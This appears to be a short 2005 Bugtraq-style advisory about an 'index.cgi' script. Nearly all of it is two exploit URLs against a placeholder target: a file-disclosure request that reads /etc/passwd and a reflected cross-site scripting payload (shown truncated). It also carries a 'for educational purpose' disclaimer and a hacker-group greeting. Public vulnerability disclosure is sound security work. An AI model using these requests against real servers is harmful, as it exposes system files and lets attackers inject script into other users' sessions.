QUOTE

index.cgi script XSS + file show

IT IS ONLY FOR SECURITY AND EDUCATIONAL PURPOSE

1)file showing
http://www.target.com/index.cgi?/etc/passwd

2)CSS
http://www.target.com/index.cgi?<script...</script>

greetz to all magattack members



Source: http://seclists.org/lists/bugtraq/2005/Apr/0411.html